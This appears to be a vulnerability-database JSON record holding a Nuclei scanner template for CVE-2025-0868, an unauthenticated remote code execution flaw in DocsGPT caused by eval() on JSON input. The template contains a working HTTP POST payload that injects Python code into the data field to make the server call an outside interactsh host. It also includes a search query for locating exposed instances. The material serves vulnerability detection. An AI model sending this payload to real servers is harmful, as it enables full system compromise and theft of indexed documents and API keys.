{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2025-0868/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2025-0868/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2025-0868/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2025-0868/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2025-0868/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2025-0868"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2025-0868"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2025/CVE-2025-0868.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2025-0868\n\ninfo:\n  name: DocsGPT - Unauthenticated Remote Code Execution\n  author: iamnoooob,rootxharsh,pdresearch\n  severity: critical\n  description: |\n    A vulnerability, that could result in Remote Code Execution (RCE), has been found in DocsGPT. Due to improper parsing of JSON data using eval() an unauthorized attacker could send arbitrary Python code to be executed via /api/remote endpoint.This issue affects DocsGPT- from 0.8.1 through 0.12.0.\n  impact: |\n    Unauthenticated attackers can execute arbitrary Python code remotely on DocsGPT servers through improper eval() usage, leading to complete system compromise and potential access to all indexed documents and API keys.\n  remediation: |\n    Upgrade to DocsGPT version 0.12.1 or later that addresses the eval() vulnerability.\n  reference:\n    - https://cert.pl/posts/2025/02/CVE-2025-0868/\n    - https://cert.pl/en/posts/2025/02/CVE-2025-0868/\n    - https://github.com/arc53/DocsGPT\n  classification:\n    epss-score: 0.17087\n    epss-percentile: 0.96971\n  metadata:\n    verified: true\n    max-request: 1\n    fofa-query: body=\"Welcome to DocsGPT\"\n  tags: cve,cve2025,docsgpt,unauth,rce,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /api/remote HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        user=1&source=reddit&name=other&data={\"source\":\"reddit\",\"client_id\":\"1111\",\"client_secret\":1111,\"user_agent\":\"111\",\"search_queries\":[\"\"],\"number_posts\":10,\"rce\\\\\\\\\":__import__('requests').get('http://{{interactsh-url}}/')}#\":11}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - dns\n\n      - type: word\n        part: body\n        words:\n          - '\"task_id\":'\n          - '\"status\":'\n        condition: and\n# digest: 4a0a00473045022077be12dfdc41ddd83d33afa3e4ee8d5e4df067987dc2454074c8423e3e99f640022100a97157bbf703176c48d167475ba2b0b9238eb407b6b936571b5b078a4a705074:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2025-0868"
}